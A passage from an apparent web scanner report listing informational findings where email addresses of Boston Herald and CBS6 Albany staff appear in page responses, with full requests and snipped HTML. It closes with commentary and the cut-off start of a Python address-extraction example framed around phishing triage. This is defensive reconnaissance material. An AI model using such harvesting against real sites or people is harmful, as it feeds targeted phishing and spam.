Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<a href="mailto:newstips@bostonherald.com">newstips@bostonherald.com</a>
...[SNIP]...

21.80. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

Issue detail

The following email addresses were disclosed in the response:

Request

GET /sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:54:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 94108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:sbulpett@bostonherald.com">
...[SNIP]...
<div id="articleTagline" style="display:none">-sbulpett@bostonherald.com</div>
...[SNIP]...

21.81. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/srvc=home&position=also

Issue detail

The following email addresses were disclosed in the response:

Request

GET /sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:54:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 49497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:sbulpett@bostonherald.com">
...[SNIP]...
<div id="articleTagline" style="display:none">-sbulpett@bostonherald.com</div>
...[SNIP]...

21.82. http://www.bostonherald.com/sports/columnists/view/20110128its_time_for_real_bargaining_nfl/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/columnists/view/20110128its_time_for_real_bargaining_nfl/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

Request

GET /sports/columnists/view/20110128its_time_for_real_bargaining_nfl/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:57:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="articleTagline" style="display:none">-rborges@bostonherald.com</div>
...[SNIP]...

21.83. http://www.bostonherald.com/sports/football/patriots/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/football/patriots/view.bg

Issue detail

The following email address was disclosed in the response:

Request

GET /sports/football/patriots/view.bg?articleid=1312522&srvc=home&position=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:53:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 48285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="articleTagline" style="display:none">kguregian@bostonherald.com</div>
...[SNIP]...

21.84. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

Issue detail

The following email address was disclosed in the response:

Request

GET /sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:53:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="articleTagline" style="display:none">kguregian@bostonherald.com</div>
...[SNIP]...

21.85. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/srvc=home&position=7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/srvc=home&position=7

Issue detail

The following email address was disclosed in the response:

Request

GET /sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/srvc=home&position=7 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:51:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 48286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="articleTagline" style="display:none">kguregian@bostonherald.com</div>
...[SNIP]...

21.86. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The following email address was disclosed in the response:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...

21.87. http://www.bostonherald.com/track/inside_track/view/20110127tracked_down_shaquille_oneal_f_murray_abraham__more/srvc=track&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110127tracked_down_shaquille_oneal_f_murray_abraham__more/srvc=track&position=also

Issue detail

The following email address was disclosed in the response:

Request

GET /track/inside_track/view/20110127tracked_down_shaquille_oneal_f_murray_abraham__more/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:32:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:trackgals@bostonherald.com">
...[SNIP]...

21.88. http://www.bostonherald.com/track/inside_track/view/20110128tracked_down_deion_branch_jarvis_green_kevin_faulk_and_more_1/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128tracked_down_deion_branch_jarvis_green_kevin_faulk_and_more_1/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

Request

GET /track/inside_track/view/20110128tracked_down_deion_branch_jarvis_green_kevin_faulk_and_more_1/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:29:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:trackgals@bostonherald.com">
...[SNIP]...
<div id="articleTagline" style="display:block">Listen to the Track at 8:20 a.m. today on WAAF 107.3 and 97.7 FM. Drop dimes to trackgals@bostonherald.com and friend us at the Track Gals at Facebook.com. Follow us on Twitter!</div>
...[SNIP]...

21.89. http://www.bostonherald.com/track/inside_track/view/20110128we_hear_mitt_romney_david_letterman_andrew_weisblum_and_more/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128we_hear_mitt_romney_david_letterman_andrew_weisblum_and_more/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

Request

GET /track/inside_track/view/20110128we_hear_mitt_romney_david_letterman_andrew_weisblum_and_more/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:30:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 42939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:trackgals@bostonherald.com">
...[SNIP]...

21.90. http://www.cbs6albany.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:28:07 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:38:07 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 78123

<br clear="all" />


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:jgretzinger@wrgb.com">
...[SNIP]...
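
The findings above all come from one passive check: match email-address patterns in the response body. As an added example, not part of the crawler's output or of either scanned site's code, the Python below reproduces that check over a raw HTTP response and adds what a triager would want next: it decodes HTML entities before matching (so an address written as news&#64;... is not missed), records where each address sat (mailto: href, hidden form field, display:none element, or visible text, the contexts seen in the bostonherald.com findings), counts repeats such as the twenty-odd hidden PayPal "business" fields on /store/, flags addresses on a domain other than the scanned host (as with jgretzinger@wrgb.com on cbs6albany.com), and separates generic role mailboxes from personal ones, which is what decides whether a disclosure feeds targeted phishing. The sample response, the host argument, the ROLE_LOCALPARTS set and the ASSET_EXT filter are constructed for the example.

```python
import re
from html import unescape
from typing import Dict, List, Tuple

# Constructed sample (not a capture from the scan): one response body that
# reproduces the disclosure patterns visible in the findings above, plus an
# entity-encoded address, an address on another domain, and an asset name
# that looks like an address but is not one.
SAMPLE_RESPONSE = (
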